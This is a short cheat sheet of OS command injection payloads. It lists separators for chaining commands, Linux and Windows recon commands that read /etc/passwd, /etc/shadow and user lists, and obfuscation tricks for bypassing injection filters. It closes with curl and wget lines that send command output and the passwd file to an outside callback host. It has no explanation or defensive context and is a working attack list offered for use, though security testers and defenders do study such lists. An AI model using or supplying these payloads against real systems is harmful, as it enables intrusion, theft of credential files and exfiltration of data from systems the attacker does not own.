OS command execution exploitation techniques
Chain commands using various separators
LinuxWindows; whoami
| whoami
|| whoami
& whoami
&& whoami
`whoami`
$(whoami)
Common Linux recon commands
Linux; cat /etc/passwd
; id
; uname -a
; ls -la
; pwd
; cat /etc/shadow
Windows-specific command injection payloads
Windows& whoami
& ipconfig
& type C:\Windows\win.ini
& dir C:\
& systeminfo
& net user
Techniques to bypass command injection filters
;w`ho`ami
;who$()ami
;who$ami
;c''at /etc/passwd
;c""at /etc/passwd
;ca\t /etc/passwd
Exfiltrate command output to external server
; curl https://callback.l4ughingm4n.dev/?data=$(whoami)
; wget https://callback.l4ughingm4n.dev/?data=$(id|base64)
; cat /etc/passwd | curl -d @- https://callback.l4ughingm4n.dev/